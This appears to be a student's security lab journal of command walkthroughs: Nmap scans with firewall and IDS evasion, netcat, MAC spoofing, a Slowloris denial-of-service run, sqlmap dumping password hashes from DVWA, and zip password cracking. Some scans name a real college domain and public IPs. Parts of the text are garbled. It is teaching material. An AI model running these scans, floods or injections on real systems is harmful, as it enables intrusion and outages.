Practical 1:

Basic Linux/Unix CommandsLinux commands

Alias:
A way to run a command or a series of Unix commands using a shorter name than thosethat are usually
associated with such commands.

Listing and Creating Aliases

The general syntax for the alias command varies somewhat according to the shell. In
the case of the bash shell it is
alias [-p] [name="value"]

alias p="pwd"
p

apt-get
Apt-get is a tool to automatically update a Debian machine and to get and install Debianpackages/programs.
Apt-get

200090107060
cat
A Unix/Linux command that can read, modify or concatenate text files. Cat commandsare most
commonly used for displaying the contents of a file.

Cd
The cd command changes the current directory in Linux and can toggle betweendirectories
conveniently

Chmod
Chmod changes the access mode (permissions) of one or more files. Only the owner of afile or a
privileged user may change the access mode.
What are the permissions?

there are three general classes of users:

 The user who owns the file ("User")

 Users belonging to the file's defined ownership group ("Group")
 Everyone else ("Other")
In turn, for each of these classes of user, there are three types of file access:

200090107060
 Permission Action chmod option
read (view) r or 4

write (edit) w or 2

execute (execute) x or 1

There are three types of user restriction

User Ls output
owner
-rwx------

group
----rwx---

other
-------rwx

Folder/Directory Permissions
Directories have directory permissions. The directory permissions restrict different actions than with files or device nodes.

Permission Action chmod option

read (view contents, i.e. ls command) r or 4

write (create or remove files from dir) w or 2

execute (cd into directory) x or 1

For more help refer https://help.ubuntu.com/community/FilePermissions

cmp
The cmp utility compares two files of any type and writes the results to the standard output. By default,
cmp is silent if the files are the same; if they differ, the byte and linenumber at which the first
difference occurred is reported.

200090107060
Cp
The cp command copies files and directories; copies can be made simultaneous toanother directory if
the copy is under a different name.

Date
Date sets a system's date and time. This is also a useful way to output/print currentinformation when
working in a script file.

Df
Df displays the amount of disk space available on the file system containing each file name argument.
With no file name, available space on all currently mounted file systemsis shown.

200090107060
 Echo

Grep
Grep searches files for a given character string or pattern and can replace the string withanother.

Ls
The ls command lists files and directories within the current working directory, allowingadmins to see
when configuration files were last edited.

200090107060
Move
mv command is used to move files and directories.

Rm
Removes the specified files from the file system

mkdir
Creates a new directory

rmdir
Deletes the specified directory

200090107060
Nslookup
Nslookup allows a user to enter a host name and find the corresponding IP address. Areverse of that
process to find the host name is also possible.

Ping
Ping allows
a user to
verify that a
particular IP address exists and can accept requests.

Sudo
Sudo allows
a

system admin to give certain users the ability to run some (or all) commands at the rootlevel and logs
all commands and arguments.

Less
―less‖ command is used to view files instead of opening the file.less does not have to read the entire
input file before starting, so with large input files it starts up faster thantext editors like vi.

Clear
This command cleans up the visible area of the console.

Du
This command when executed without any parameters shows the total disk spaceoccupied by files and
subdirectories in the current directory.

200090107060
Df
This command when used without any option displays informations about the total
diskspace , the disk space currently in use and the free space on all the mounted
drives.

Touch
The touch command is the easiest way to create new and empty file.

Who
This command prints the username associated with the current effective use id.

Sign: _______ _ _ __
200090107060
 Practical – 2: TCP Scanning Using Nmap

Target Specification:

1. Scan a single host or an IP address (IPv4)

1. Scan single IP Address
Ex:- nmap 65.1.234.224

2. Scan a host name

Ex:- nmap ckpcet.ac.in

3. Scan a host name with more info

Ex:- nmap -v ckpcet.ac.in

200090107060
2. Scan multiple IP address or subnet (IPv4)
Ex:- nmap 65.1.234.223 65.1.234.224 65.1.234.225

Ex:- nmap 65.1.234.223, 224,225

200090107060
Scan a range of IP address:-
Ex:- nmap 65.1.234.220-230

Scan a range of IP address using a wildcard:

Ex:- nmap 65.1.234.*

200090107060
 Scan a range of IP address using wildcard:-
Ex:- nmap <IP address/dir>

3. Read list of hosts/networks from a file (IPv4)

The -iL option allows you to read the list of target systems using a text file. This is
useful to scan a large number of hosts/networks. Create a text file as follows:
Cat > <file name>
Ex:- nmap -iL <input file name>

4. Random Host to scan

For random host scanning -iR option is used. Nmap generates its own targets to scan.
The <number of host> argument tells nmap the number of IPs to generate.
Ex:- nmap -iR 3

200090107060
5. Excluding hosts/networks (IPv4)
When scanning a large number of hosts/networks you can exclude hosts from a scan.
Ex1: nmap 172.16.1.0/25 --exclude 172.16.1.25

Ex2: nmap 172.16.1.0/25 --exclude 172.16.1.25, 172.16.1.23

6. Excluding host/network (IPv4)

Ex: nmap 172.16.1.0/25 --excludefile <file name>

200090107060
Host Discovery:

7. –sL (list scan)

The list scan is a degenerate form of host discovery that simply lists each host of the
network(s) specified, without sending any packets to the target hosts. Since the idea is to simply
print a list of target hosts, options for higher level functionality such as port scanning, OS
detection, or ping scanning cannot be combined with this.
Ex: nmap -sL 172.16.1.*

200090107060
8. -sn (No port Scan)
This option tells Nmap not to do a port scan after host discovery, and only print out
the available hosts that responded to the scan
Ex: nmap -sn 172.16.1.*

200090107060
9. -Pn (No ping Scan)
This option skips the Nmap discovery stage altogether. Normally, Nmap uses this
stage to determine active machines for heavier scanning. By default, Nmap only performs
heavy probing such as port scans, version detection, or OS detection against hosts that are
found to be up. Disabling host discovery with -Pn causes Nmap to attempt the requested
scanning functions against every target IP address specified. So if a class B target address space
(/16) is specified on the command line, all 65,536 IP addresses are scanned. Proper host
discovery is skipped as with the list scan, but instead of stopping and printing the target list,
Nmap continues to perform requested functions as if each target IP is active.
Ex: nmap -Pn ckpcet.ac.in

10. -PS (TCP-SYN ping)

The TCP SYN ping accomplishes its goal in just a few packets. This minimal amount
of network traffic appears to be normal TCP handshake frames. This makes the TCP SYN ping
appear almost invisible when compared to normal network traffic.
Ex: nmap -PS ckpcet.ac.in

200090107060
11. -PA (TCP-ACK ping)
The TCP-ACK ping uses little network traffic. In most cases, the common ACK
query to a device is relatively undetectable. The TCP-ACK ping also allows different port
numbers to be probed, providing nmap with additional options when negotiating a scan through
a firewall. The TCP-ACK ping identifies a filtered connection or a non-filtered connection.
This is a perfect use of a ping probe, since the goal of the ping is to get any type of response
from a remote device. An nmap ping doesn't focus on identifying ports. Instead, its goal is to
locate other active devices.
Ex: nmap -PA ckpcet.ac.in

12. -PU (UDP ping)

The port list takes the same format as with the previously discussed -PS and -PA
options. If no ports are specified, the default is 40125.The primary advantage of this scan type
is that it bypasses firewalls and filters that only screen TCP.
Ex: nmap -PU ckpcet.ac.in

200090107060
13. -PO (IP Protocol Ping)
One of the newer host discovery options is the IP protocol ping, which sends IP
packets with the specified protocol number set in their IP header. The protocol list takes the
same format as do port lists in the previously discussed TCP and UDP host discovery options.
Ex: nmap -PO ckpcet.ac.in

14. -traceroute
Traceroutes are performed post-scan using information from the scan results to
determine the port and protocol most likely to reach the target. It works with all scan types
except connect scans (-sT) and idle scans (-sI). All traces use Nmap's dynamic timing model
and are performed in parallel.
Ex: nmap -traceroute ckpcet.ac.in

200090107060
15. -sS (TCP SYN Scan)
SYN-scanning, or Half Open scanning is where the full TCP connection is never
made. SYN-scanning sends the first packet only, the one marked with the SYN flag. It waits
for either a RST, ACK or SYN-ACK response. If a RST-ACK response comes in there is
nothing is running on the port and issues a RST. If a SYN-ACK response is received, a service
is known to be running on the port. The benefit of TCP SYN scanning is the fact that most
logging applications do not look to log TCP RST by default. They generally create a log entry
in the application/device/server when the final ACK comes from the client device. Due to the
fact that this ACK never comes but a RST, it can go unnoticed if a scan is taken place.
Ex: nmap –sS ckpcet.ac.in

16. -sT (Tcp connect Scan)

An attacker uses full TCP connection attempts to determine if a port is open. The
scanning process involves completing a 'three-way handshake' with a remote port, and reports
the port as closed if the full handshake cannot be established. An advantage of TCP connect
scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are
established and torn down. TCP connect scanning commonly involves establishing a full
connection, and then subsequently tearing it down, and therefore involves sending a significant
number of packets to each port that is scanned. Compared to other types of scans, a TCP
Connect scan is slow and methodical
Ex: nmap –sT ckpcet.ac.in

200090107060
17. -sU (UDP Scan)
UDP port scan available for common UDP services. The UDP port scan is part of the
IP Tools range of network testing tools. The test uses the excellent Nmap Port Scanner to scan
5 of the most common UDP ports. Ports tested in the quick UDP scan are 53, 123, 161, 5353
and 1900.
Ex: nmap -sU ckpcet.ac.in

200090107060
18. -sY (SCTP INIT Scan)
SCTP is a relatively new alternative to the TCP and UDP protocols, combining most
characteristics of TCP and UDP, and also adding new features like multi-homing and multi-
streaming. It is mostly being used for SS7/SIGTRAN related services but has the potential to
be used for other applications as well. SCTP INIT scan is the SCTP equivalent of a TCP SYN
scan. It can be performed quickly, scanning thousands of ports per second on a fast network
not hampered by restrictive firewalls. Like SYN scan, INIT scan is relatively unobtrusive and
stealthy, since it never completes SCTP associations. It also allows clear, reliable
differentiation between the open, closed, and filtered states. This technique is often referred to
as half-open scanning.
Ex: nmap -sY ckpcet.ac.in

19. -sF (Fin Scan)

Similar to SNY-ACK scan, instead a FIN flag is sent to the target. The closed ports
are required to reply to the probe packet with RST, while open ports must ignore the packet in
question.
Ex: nmap -sF ckpcet.ac.in

200090107060
20. -sN (Null Scan)
In NULL scan, the packet is sent without any flag set. This takes advantage of RFC
793 as the RFC does not specify how the system should respond. Most UNIX and UNIX related
system respond with a RST (if the port is open) to close the connection.
Ex: nmap -sN ckpcet.ac.in

21. -sX (Xmas Scan)

In Xmas scan, all flags are set. All the available flags in the TCP header are set (ACK,
FIN, RST, SYN, URG, and PSH) to give the scan an ornamental look. This scan will work on
UNIX and related systems and cause the kernel to drop the packet if the receiving port is open.
Ex: nmap -sX ckpcet.ac.in

200090107060
22. -sA (TCP ACK Scan)
This type of Scanning is used to map out firewall rule sets. It can determine that the
firewall is stateful or just a packed filter that blocks incoming SYN packets. In this type of scan
an Ack packet is send to the port and if it replies with an RST it means it is unfiltered and it is
open and if no reply is returned it is classified as filtered.
Ex: nmap -sA ckpcet.ac.in

23. -sW (TCP Window Scan)

Window scan is exactly the same as ACK scan except that it exploits an
implementation detail of certain systems to differentiate open ports from closed ones, rather
than always printing unfiltered when a RST is returned. It does this by examining the TCP
Window field of the RST packets returned. On some systems, open ports use a positive window
size (even for RST packets) while closed ones have a zero window. So instead of always listing
a port as unfiltered when it receives a RST back, Window scan lists the port as open or closed
if the TCP Window value in that reset is positive or zero, respectively. This scan relies on an
implementation detail of a minority of systems out on the Internet, so you can't always trust it.
Systems that don't support it will usually return all ports closed. Of course, it is possible that
the machine really has no open ports. If most scanned ports are closed but a few common port
numbers (such as 22, 25, and 53) are filtered, the system is most likely susceptible.
Occasionally, systems will even show the exact opposite behaviour. If your scan shows 1,000
open ports and three closed or filtered ports, then those three may very well be the truly open
ones.
Ex: nmap -sW ckpcet.ac.in

200090107060
24. -sI <zombie host> [:<probeport>] (ideal Scan)
This advanced scan method allows for a truly blind TCP port scan of the target
(meaning no packets are sent to the target from your real IP address). Instead, a unique side-
channel attack exploits predictable IP fragmentation ID sequence generation on the zombie
host to glean information about the open ports on the target. IDS systems will display the scan
as coming from the zombie machine you specify (which must be up and meet certain criteria).
Full details of this fascinating scan type are in the section called ―TCP Idle Scan (-sI)‖.
Besides being extraordinarily stealthy (due to its blind nature), this scan type permits
mapping out IP-based trust relationships between machines. The port listing shows open ports
from the perspective of the zombie host. So you can try scanning a target using various zombies
that you think might be trusted (via router/packet filter rules).
You can add a colon followed by a port number to the zombie host if you wish to
probe a particular port on the zombie for IP ID changes. Otherwise Nmap will use the port it
uses by default for TCP pings (80).
Ex: nmap --packet-trace -sI 172.16.1.17 172.16.1.18

25. -sO (IP protocol Scan)

IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP,
etc.) are supported by target machines. This isn't technically a port scan, since it cycles through
IP protocol numbers rather than TCP or UDP port numbers. Yet it still uses the -p option to
select scanned protocol numbers, reports its results within the normal port table format, and
even uses the same underlying scan engine as the true port scanning methods.
Ex: nmap -sO ckpcet.ac.in

200090107060
Version Detection:

26. -sV (Version detection)

Enables version detection.
Ex: nmap -sV ckpcet.ac.in

27. --allports (Don‘t exclude any ports from version detection)

By default, Nmap version detection skips TCP port 9100 because some printers
simply print anything sent to that port, leading to dozens of pages of HTTP GET requests,
binary SSL session requests, etc. This behaviour can be changed by modifying or removing the

200090107060
Exclude directive in nmap-service-probes, or you can specify –allports to scan all ports
regardless of any Exclude directive.
Ex: nmap --allports ckpcet.ac.in

28. -O (To know remote operating system)

Ex: nmap -O ckpcet.ac.in

200090107060
Timing and Performance:

29. –T<0-5>set timing template (High is faster)

There are various timing options included in the nmap to send successive packets. It
can be used to evade some of the rules in the firewalls or IDS.
T0: Paranoid (Waits 5 minutes between sending each probes, not detected by IDS/IPS)
T1: Sneaky (waits 15 seconds)
T2: Polite
T3: Normal
T4: Aggressive
T5: Insane (easily detectable)
Ex: nmap –T<0-5> ckpcet.ac.in

` Ex2: nmap -v -sS -A -T4 ckpcet.ac.in

200090107060
Firewall/IDS Evasion and Spoofing:

30. -f (Packet Fragmentation)

The -f option causes the requested scan (including ping scans) to use tiny fragmented
IP packets. The idea is to split up the TCP header over several packets to make it harder for
packet filters, intrusion detection systems, and other annoyances to detect what you are doing.
Ex: nmap -f ckpcet.ac.in

31. -S <IP_Address > : Spoof source address

Attacker can spoof the source IP address (from the victim's subnet) so that it'll appear
to IDS/firewall that it's legitimate user and will be passed.
Ex: nmap -v -sT -PN --spoof-mac 0 192.168.1.1

200090107060
32. -oN/-oX/-oS/-oG <file>
Output scan in normal, XML, s|<rIpt kIddi3,and Grepable format, respectively, to the
given filename.
EX: nmap -oN output.txt ckpcet.ac.in

33. –open
Only show open (or possibly open) ports
Ex: nmap --open ckpcet.ac.in

200090107060
34. --iflist
Print host interfaces and routes (for debugging)
Ex: nmap --iflist

35. --reason
Display the reason a port is in a particular state
Ex: nmap --reason ckpcet.ac.in

36. --packet-trace
Show all packets sent and received

200090107060
 Ex: nmap --packet-trace ckpcet.ac.in

MISC:
37. -6
Enable IPv6 scanning
Ex: nmap -6 www.ipv6.net.cn

38. -V
Print version number

200090107060
 Ex: nmap –V

39. -h
Print this help summary page.
Ex: nmap -h

40. -A
Enable OS detection, version detection, script scanning, and traceroute
Ex: nmap -A ckpcet.ac.in

200090107060
41. –p <port ranges>
Only scan specified ports
Ex: nmap -p 80 ckpcet.ac.in
nmap -p 50-100 ckpcet.ac.in
nmap -p 80,443 ckpcet.ac.in

200090107060
42. --exclude-ports <port ranges>
Exclude the specified ports from scanning
Ex: nmap ckpcet.ac.in -exclude-ports 80

43. -F (Fast mode)

Scan fewer ports than the default scan
Ex: nmap -F ckpcet.ac.in

200090107060
44. -r
Scan ports consecutively
Ex: nmap -r ckpcet.ac.in

45. -top-ports <number>

Scan <number> most common ports
Ex: nmap -top-ports 10 ckpcet.ac.in

200090107060
 Sign: _______ _ _ __

200090107060
 Practical – 3: TCP / UDP Connectivity Using Netcat

Netcat:
Netcat (often abbreviated to nc) is a stands for Network Concatenate files. It also
known as the TCP/IP Swiss army knife is a feature-rich network utility which can be used to
read and write data to network connections using TCP or UDP. Following are the applications
of Netcat:
1. Chat Server
2. Web Server
3. Port Scanning
4. File transfer
5. Getting Remote Shell (Ethical Way)

Chat Server:
To create a simple chat we need two instances of Netcat, one to listen for incoming
connections (Server side) and another one to start the connection (Client side).

Server side:
1. Open terminal and run command netcat -l -p <port number>
Where, -l is use to start listening mode
-p is use for specify a port.

200090107060
2. When the connection is established you can communicate with client.

Client side:
1. For connect with server client need IP address of server. After getting server‘s IP address
run following command in client‘s terminal:

netcat <Server’s IP address> <Port number>

Where, port number is a port number which is used by server.

200090107060
2. Now connection is established, you can communicate with server.

200090107060
File Transfer:
Although the TCP protocol is primarily used for transferring web traffic around the
world, it can actually be implemented at a local level for file transfers. To accomplish this, you
need to run Netcat from two locations: one that will act as a server to send the file and one that
will act as the client to receive it.

Server Side:
1. Create a blank file to store the data which is sent by the client.

2. Run the following command to receive data

netcat -l -p 1234 > <file name>
Where, -l is use to start listening mode
-p is use for specify a port.
> is use for store data in blank file

200090107060
3. Now view the file, you can see data that is sent by the client.

200090107060
Client Side:
1. Create a file that contain data which you want to send.

2. Run the following command to send data

netcat <Server’s IP address> <Port number> < <file name>

200090107060
 In file transfer client can also be a receiver and server can also be a sender. For that
you need to do some change in command like in server side: netcat -l -p 1234 < <file name>
and in client side: netcat <Server’s IP address> <Port number> > <file name>.

Sign: _______ _ _ __

200090107060
 Practical-4:
Install Kali Linux. Examine the utilities and tools available in
Kali Linux and find out which tool is the best for finding
cyberattack/vulnerability.

Kali Linux:
Kali Linux is an open-source, Debian-based Linux distribution aimed at advanced
Penetration Testing and Security Auditing. Kali Linux contains several hundred tools targeted
towards various information security tasks, such as Penetration Testing, Security Research,
Computer Forensics and Reverse Engineering. Kali Linux is a multi-platform solution,
accessible and freely available to information security professionals and hobbyists.

Installation of Kali Linux Using VirtualBox:

1. Download and install VirtualBox:

The easiest way to install VirtualBox is by using the official Ubuntu repositories.
1. Open terminal and enter the following command to update the repository:
sudo apt-get update

200090107060
2. Download and Install VirtualBox By following command:
sudo apt install virtualbox virtualbox-ext-pack

Read the VirtualBox Extension Pack Personal Use and Evaluation License and select <Ok> to
confirm you understand.

200090107060
Accept the terms of the VirtualBox PUEL license by selecting <Yes> and hitting Enter.

Finally, the output displays you have successfully installed "Oracle VM VirtualBox Extension
Pack".

Interface of VirtualBox:

200090107060
2. Load ISO file of Kali Linux in VirtualBox:

1. Download ISO file for VirtualBox from official site of Kali Linux.

2. Import ISO of Kali Linux in VirtualBox as follows:

File Menu > Import Appliance > Browse Kali > Next > Import > Agree

200090107060
200090107060
200090107060
Overview of kali Linux:

Kali Linux has around 600 pre-installed penetration-testing tools. All tools are
divided as per their use like:
1. Information Gathering Tools
2. Vulnerability Analysis Tools
3. Web Application Analysis Tools
4. Database Assessment Tools
5. Password Attacks Tools
6. Wireless Attacks Tools
7. Reverse Engineering Tools
8. Exploitation Tools
9. Sniffing & Spoofing Tools
10. Post Exploitation Tools
11. Forensics Tools
12. Reporting Tools
13. Social Engineering Tools

200090107060
Nmap:
Nmap (Network Mapper) is a free and open-source network scanner created
by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich). Nmap is used to
discover hosts and services on a computer network by sending packets and analyzing the
responses.
Nmap provides a number of features for probing computer networks, including host
discovery and service and operating system detection. These features are extensible
by scripts that provide more advanced service detection, vulnerability detection, and other
features. Nmap can adapt to network conditions including latency and congestion during a scan.

Uses of Nmap:
1. To determine what hosts are available on the network.
2. Available services (application name and version) those hosts are offering.
3. Operating systems (and OS versions) they are running.
4. Type of packet filters/firewalls are in use.

Wireshark:
Wireshark is an open-source network protocol analysis software program started
by Gerald Combs in 1998. A global organization of network specialists and software
developers support Wireshark and continue to make updates for new network technologies and
encryption methods.

Wireshark is absolutely safe to use. Government agencies, corporations, non-profits,

and educational institutions use Wireshark for troubleshooting and teaching purposes. There
isn‘t a better way to learn networking than to look at the traffic under the Wireshark
microscope.

There are questions about the legality of Wireshark since it is a powerful packet sniffer.
The Light side of the Force says that you should only use Wireshark on networks where you
have permission to inspect network packets. Using Wireshark to look at packets without
permission is a path to the Dark Side.

Functionality:

1. Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated
sorting and filtering options.

2. User can see all traffic visible on that interface.

3. If a remote machine captures packets and sends the captured packets to a machine running
wireshark using the TZSP protocol. So it can analyse packets captured on a remote machine at
the time they are captured.

4. It understands the structure of different networking protocols. It can parse and display the
fields along with their meaning as specified by different protocols.

200090107060
5. You can use it to review traffic captured by tools like tcpdump or windump or use it to
capture traffic directly.

6. It also supports capture formats from several other commercial and open source network
sniffers.

Use of Wireshark:

1. Network administrators use it to troubleshoot network problems.

2. Network security engineers us it to examine security problems.

3. Developers use it to debug protocol implementations.

4. People use it to learn network protocol internals.

5. Display the network traffic in human-readable format.

Metasploit Framework:

The Metasploit Project is a computer security project that provides information

about security vulnerabilities and aids in penetration testing and IDS signature development. It
is owned by Boston, Massachusetts-based security company Rapid7.
Its best-known sub-project is the open-source Metasploit Framework, a tool for
developing and executing exploit code against a remote target machine. Other important sub-
projects include the Opcode Database, shell code archive and related research.
The Metasploit Project includes anti-forensic and evasion tools, some of which are built
into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux operating system.

Sign: _______ _ _ __

200090107060
 Practical:-5
Evaluate Network Defence tools for Following
1. IP spoofing
2. DOS Attacks

1. IP Spoofing:
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified
source address in order to either hide the identity of the sender, to impersonate another
computer system, or both. It is a technique often used by bad actors to invoke DDoS
attacks against a target device or the surrounding infrastructure.

Sending and receiving IP packets is a primary way in which networked computer and
other devices communicate and constitutes the basis of the modern internet. All IP packets
contain a header which precedes the body of the packet and contains important routing
information, including the source address. In a normal packet, the source IP address is the
address of the sender of the packet. If the packet has been spoofed, the source address will be
forged.

Macchanger:

A Media Access Control (MAC) address is a unique number that gets assigned to every
network interface, including Ethernet and wireless. It‘s used by many system programs and
protocols in order to identify a network interface. One of the most common examples would
be in the case of DHCP, where a router assigns an IP address to a network interface
automatically. The router will know which device it has assigned an IP address to by referring
to the MAC address.

Unlike an IP address, which is temporary and can be changed easily, MAC addresses
are hardcoded into a network interface from the manufacturer. However, it‘s still possible to
change or ―spoof‖ a MAC address temporarily. On Linux systems, one of the easiest ways to
do this is with the macchanger command line program. There are both legitimate and shady
reasons for why a Linux user may find the need to change a MAC address.

In this guide, we‘ll show how to install the macchanger program on major Linux
distros and then use the macchanger command to change the MAC address of a network
interface either to a random value or some specific number.

200090107060
Example:

Before we start using the macchanger command, you‘ll need to know the name of the network
interface that you want to work with. You can execute the ip a command to see a list of all the
available network interfaces on your system. In most cases this will include a wired, wireless,
and loopback interface.

The name of network interface is eth0 and MAC address of system is 08:00:27:0e:34:8d.

Step:-1 Use -r command to get a random MAC address.

Sudo macchanger -r <network interface>

200090107060
Step:-2 To verify the change run ip a command.

2. DoS attack:

DoS (Denial of Service) is an attack performed on a computer or a network that reduces,

restricts or prevents accessibility of system resources to legitimate users. In simple terms,
Attacker floods the victim system with the malicious traffic to overload its resources. A DoS
attack can do temporary or permanent damage to a website. It can also slow down network
performance.

Tools for DoS/DDoS attack:

1. Slowloris
2. LOIC (Low Orbit Iron Canon)
3. HOIC (High Orbit Iron Canon)
4. Pyloris

200090107060
Slowloris:
Slowloris is a free and open source tool available on Github. We can perform a denial
of service attack using this tool. It‘s a framework written in python. This tool allows a single
machine to take down another machine‘s web server using perfectly legitimate HTTP traffic.
It makes a full TCP connection and then requires only a few hundred requests at long-term and
regular intervals. As a result, the tool doesn‘t need to spend a lot of traffic to exhaust the
available connections on a server.

Use of Slowloris:
 Slowloris sends multiple requests to the target as a result generates heavy traffic
botnets.
 Slowloris can be used to perform ddos attacks on any web server.
 It is an open-source tool, so you can download it from github free of cost.
 It uses perfectly legitimate HTTP traffic.
 Denial of service attack can be executed with the help of Slowloris by generating heavy
traffic of botnets.

Installation and step-by-step implementation of slowloris tool:

Step:-1 Open your Kali Linux and then Open your Terminal.
Step:-2 Create a new Directory on Desktop named Slowloris using the following command.
mkdir Slowloris
Step:-3 Move to the directory that you have to create (Slowloris).
cd Slowloris

200090107060
 Step:-4 Now you have to clone the Slowloris tool from Github so that you can install it on
your Kali Linux machine. For that, you only have to type the following URL in your terminal
within the Slowloris directory that you have created.
git clone https://github.com/gkbrk/slowloris.git

Step:-5 Now go to the Action bar and click on split terminal vertically then you will see that
the two-terminal screen has been opened now.
Step:-6 Now you have to check the IP address of your machine to do that type following
command.

Ifconfig

200090107060
Step:-7 As you can see we got our IP address now it‘s time to start the apache server, to start
the apache server using the following command.

sudo service apache 2 start

Step:-8 Now we have to check the status of your server whether it is active or not so to check
the status of your server run the following command.

service apache2 status

200090107060
 Step:-9 We can see that our server is under active status. It means it is running properly, now
comes back to the first terminal, and to check permissions run the following command.

Ls –l
Step:-10 Now it‘s time to run the tool using the following command.
python3 slowloris .py (your ip address) -s 500
Step:-11 You can see the tool has started attacking on that particular IP address which we
have given now to check whether its working or not go to your browser and on your URL
bar type that IP address, and you will see the site is only loading and loading but not opening
this is how Slowloris tool works.

Sign: _______ _ _ __

200090107060
 Practical: - 6
Examine SQL injection attack, Perform SQL injection with
Sqlmap on vulnerable website found using DVWA.

SQL injection Attack:

SQL injection is a web security vulnerability that allows an attacker to interfere with
the queries that an application makes to its database. It generally allows an attacker to view
data that they are not normally able to retrieve. This might include data belonging to other
users, or any other data that the application itself is able to access. In many cases, an attacker
can modify or delete this data, causing persistent changes to the application's content or
behaviour.
In some situations, an attacker can escalate an SQL injection attack to compromise
the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
A successful SQL injection attack can result in unauthorized access to sensitive data,
such as passwords, credit card details, or personal user information. Many high-profile data
breaches in recent years have been the result of SQL injection attacks, leading to reputational
damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into
an organization's systems, leading to a long-term compromise that can go unnoticed for an
extended period.

SQL injection with DVWA:

Start your DVWA VM and the Kali Linux box. To find the cookies value and to monitor sqlmap
activity it‘s best to use a proxy. Open the OWASP ZAP (you can also try using Burp Suite) and
click the firefox button:

200090107060
Navigate to the DVWA web page and add the current domain to scope clicking the top left
button of the ZAP HUD:

Login, set the security to ‗low‘ and go to SQL Injection (Blind). Search for the ID ‗1‘. The
parameters we‘ll need for SQLmap are displayed in ZAP, so go and take a look

Create a command with right parameters:

200090107060
$ sqlmap -u ―http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=‖PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low‖

We‘ve discovered the DBMS is MySQL 5.0.12, the OS is Ubuntu and the web server is Apache
2.4.29.Let‘s list the databases available using the ―--dbs‖ parameter:
$ sqlmap -u ―http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=‖PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low‖

200090107060
Now, find the tables with ‗-D dvwa --tables‘
$ sqlmap -u ―http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=‖PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low‖ -D dvwa –tables

Now we‘ll take a look at the columns ‗-D dvwa -T users --columns‘:
$ sqlmap -u ―http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=‖PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low‖ -D dvwa -T users –columns

200090107060
And now we‘ll get the dump:
$ sqlmap -u ―http://192.168.56.101/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --
proxy=http://127.0.0.1:8080 --cookie=‖PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low‖ -D dvwa -T users –dump

We have obtained the users table and password hashes!!! At the end SQLMap will suggest the
use of a dictionary for the hashes. It‘s optional.

Sign: _______ _ _ __

200090107060
 Practical: - 7
Use Wireshark tool and explore the packet format and content
ateach OSI Layer

Wireshark:
Wireshark is an open-source network protocol analysis software program started
by Gerald Combs in 1998. A global organization of network specialists and software
developers support Wireshark and continue to make updates for new network technologies and
encryption methods.
Wireshark is absolutely safe to use. Government agencies, corporations, non-profits,
and educational institutions use Wireshark for troubleshooting and teaching purposes. There
isn‘t a better way to learn networking than to look at the traffic under the Wireshark
microscope.
There are questions about the legality of Wireshark since it is a powerful packet
sniffer. The Light side of the Force says that you should only use Wireshark on networks where
you have permission to inspect network packets. Using Wireshark to look at packets without
permission is a path to the Dark Side.

200090107060
OSI Layers Analysis by Wireshark:
With the help of some protocols as example we understand the layers through
wireshark. The interesting part is all protocol does not have all the layers.
As Wireshark decodes packets at Data Link layer so we will not get physical layer
information always. In some cases, capturing adapter provides some physical layer information
and can be displayed through Wireshark.
So here are the sequence layers seen in Wireshark
1. Data link layer
2. Network layer
3. Transport Layer
4. Application Layer
Wireshark Shows data in reverse order, If physical Layer information is given to
wireshark then that time we should see physical layer information on top of data link layer.

1. HTTP:
HTTP neans Hypertext Transfer Protocol. HTTP packet has 4 layers. OCSP is a
Hypertext Transfer Protocol (HTTP) used for obtaining the revocation status of an X. 509
digital certificate.

2. TCP:
TCP means Transmission Control Protocol. TCP packet has 3 layer.

200090107060
3. ICMP:
ICMP means internet Control Message Protocol. ICMP packets has 2 layers.

Sign: _______ _ _ __

200090107060
 Practical: - 8
Perform online attacks and offline attacks of Password
cracking

1. Online Password Cracking Attacks:

Online password cracking is attacking a computer system through an interface that it

presents to its legitimate users by attempting to guess the login credentials. For instance, an
attacker can try to guess a user‘s credentials for a web application login page; for an SSH or
Telnet server; or for a network service such as Lightweight Directory Access Protocol (LDAP),
one of the mail protocols (SMTP, POP3, or IMAP), FTP, or one of many others.
There are many pre-installed tools for online password cracking in kali Linux like:
1. THC – Hydra
2. John the Ripper
3. Aircrack-NG
4. Cain & Abel
5. Wfuzz

John the Ripper:

First released in 1996, John the Ripper (JtR) is a password cracking tool originally
produced for UNIX-based systems. It was designed to test password strength, brute-force
encrypted (hashed) passwords, and crack passwords via dictionary attacks.
Some of the key features of the tool include offering multiple modes to speed up
password cracking, automatically detecting the hashing algorithm used by the encrypted
passwords, and the ease of running and configuring the tool making it a password cracking
tool of choice for novices and professionals alike.

Example:
Crack password of a lock zip file using john the ripper.

Step:- 1
Convert Zip file into Hash file.

Command: zip2john <Zip file name>

200090107060
Step:- 2
Save the hash code of zip file in hash file

Command : zip2john <Zipfile name> > <hash file name>

Note: Extension of hash file is .hashes

200090107060
Step:- 3
Now run john the ripper directly on the hash file.

Command: john <hash file name>

Step:- 4
Password crack successfully you can see it with --show Command.
Command: john <hash file name> --show

200090107060
2. Offline Password Cracking Attacks:
Offline Password Cracking is an attempt to recover one or more passwords from a
password storage file that has been recovered from a target system. Typically, this would be
